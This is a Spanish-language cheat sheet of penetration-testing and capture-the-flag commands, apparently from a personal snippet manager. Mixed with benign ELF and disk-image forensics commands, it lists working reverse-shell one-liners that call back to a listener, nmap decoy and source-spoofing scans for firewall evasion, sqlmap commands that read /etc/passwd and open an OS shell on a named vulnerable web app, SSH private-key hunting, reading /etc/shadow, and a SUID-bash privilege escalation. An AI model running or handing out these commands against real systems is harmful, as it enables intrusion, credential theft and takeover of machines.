Shell inversa (reverse slall) si se tiene acceso
Comandos Linux
#1 rlwrap nc -lvnp 13000#2 bash -c 'bash -i >& /dev/tcp/0.0.0.0/13000 0>&1'#3 bash -i >& /dev/tcp/0.0.0.0/13000 0>&1#4 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 13000 >/tmp/f
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Mejorar la experiencia al utilizar una shell, ya sea con python2 o python3
Python
#1 python -c 'import pty; pty.spawn("/bin/bash")'#2 python3 -c 'import pty; pty.spawn("/bin/bash")'
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Evasion de firewall o IDS (nmap y netcat)
Nmap
#1 sudo nmap 1.1.1.1 -p 21,22,25 -sA -Pn -n --disable-arp-ping --packet-trace#2 sudo nmap 1.1.1.1 -p 80 -sS -Pn -n --disable-arp-ping --packet-trace -D RND:5#3 sudo nmap 1.1.1.1 -n -Pn -p 445 -O -S 0.0.0.0 -e tun0#4 sudo nmap 1.1.1.1 -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53#5 ncat -nv --source-port 53 1.1.1.1 50000#6 sudo nmap -sSU -p 53 --script dns-nsid 1.1.1.1 -Pn -sV
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Reconocimiento de puertos y servicios
Nmap
#1 sudo nmap -p- -Pn --min-rate 5000 -T4 1.1.1.1#2 sudo nmap -sCV 1.1.1.1 -p22,80
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Obtener shell con sqlmap, guardando la peticion con burpsuite como item
SQLMap
#1 sqlmap -r saveitem --os-shell --dbms=mysql#2 nc -e /bin/bash 0.0.0.0 13000
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Listar y leer directorio de ext sin montar la imagen (.dump)
debugfs
#1 debugfs -R "ls -l /" archivo.dump 2>/dev/null#2 debugfs -R "cat /archivo_listado" archivo.dump 2>/dev/null
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Buscar claves privadas (RSA)
Comandos Linux
#1 ls -la /home /root /etc/ssh /home/*/.ssh/; locate id_rsa; locate id_dsa; find / -name id_rsa 2> /dev/null
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Bypassing SSH con biblioteca vulnerable (libssh 0.8.1)
exploits
#1 python3 cve-2018-10933.py
Descargar Script/exploit
Editar
Archivo
Eliminar
Escalacion mediante ssh escuchando por localhost como root (conociendo la phrase)
Comandos Linux
#1 ss -a#2 ss -ant#3 ps -eafww#4 ssh -i .ssh/mykey root@127.0.0.1
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Imprimir archivos desde consola de python
Python
#1 print open("/etc/shadow", "r").read()#2 print open("/etc/passwd", "r").read()#3 print open("/proc/self/environ", "r").read()
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Ejecución de main en un archivo ELF, con breakpoint
Comandos Linux
#1 gdb -q -batch \ -ex 'set debuginfod enabled off' \ -ex 'break main' \ -ex 'run' \ -ex 'call (int)x375fb33ff()' \ -ex 'call (int)fflush(0)' \ ./archivo_elf
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Volcado de la sección .rodata o .data de un archivo .elf
Comandos Linux
#1 objdump -s -j .rodata --start-address=0x47d000 --stop-address=0x47d020 \ archivo_binario
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Desensamblas una función de un archivo .elf (main)
Comandos Linux
#1 objdump -d --no-show-raw-insn -M intel archivo_elf --disassemble=main
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Obtener cadenas a partir de un parametro (CTF) en un archivo .elf
Comandos Linux
#1 readelf -sW archivo_elf | awk '$4=="FILE"' | grep -i CTF
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Obtenemos una sección (.comment) del un .ELF
Comandos Linux
#1 readelf -p .comment archivo_elf
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Quitar saltos de linea, convertir a horizontal texto en vertical (txt)
Comandos Linux
#1 tail -n +2 fatfile.txt | tr -d '\n'
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Reconocimiento inicial de un archivo de volcado (ext, fat)
Comandos Linux
#1 file archivo.dump#2 parted archivo.dump print#3 fsstat archivo.dump#4 xxd -g 1 -l 512 archivo.dump#5 binwalk archivo.dump
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Escalacion (CVE-2024-36583)
Comandos Linux
#1 sudo /usr/local/bin/breal '{}' '__proto__.cmd' '"chmod +s /usr/bin/bash"'#2 /usr/bin/bash -p
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Inyección de SQL Food Ordering Management System, CVE-2024-8557, CVE-2024-6216
SQLMap
#1 sqlmap -u "http://1.1.1.1.1/all-orders.php?status=Delivered" --dbs --dbms=mysql --cookie='PHPSESSID=pq4cukkr93chi9ldpkji438p4p'#2 sqlmap -u "http://10.0.14.39/all-orders.php?status=Delivered" --dbms=mysql --cookie='PHPSESSID=pq4cukkr93chi9ldpkji438p4p' --file-read=/etc/passwd#3 sqlmap -u "http://10.0.14.39/all-orders.php?status=Delivered" --dbms=mysql --cookie='PHPSESSID=9lgm62u8dqrce118ajhcokoie0' --os-shell#4 nc -e /bin/bash 10.10.3.234 13000
Sin Script/exploit asociado
Editar
Archivo
Eliminar
Reconocimiento web con CURL
curl
#1 curl -sSik http://1.1.1.1.1#2 curl -sSik http://1.1.1.1.1/login.php
Sin Script/exploit asociado
Editar
Archivo
Eliminar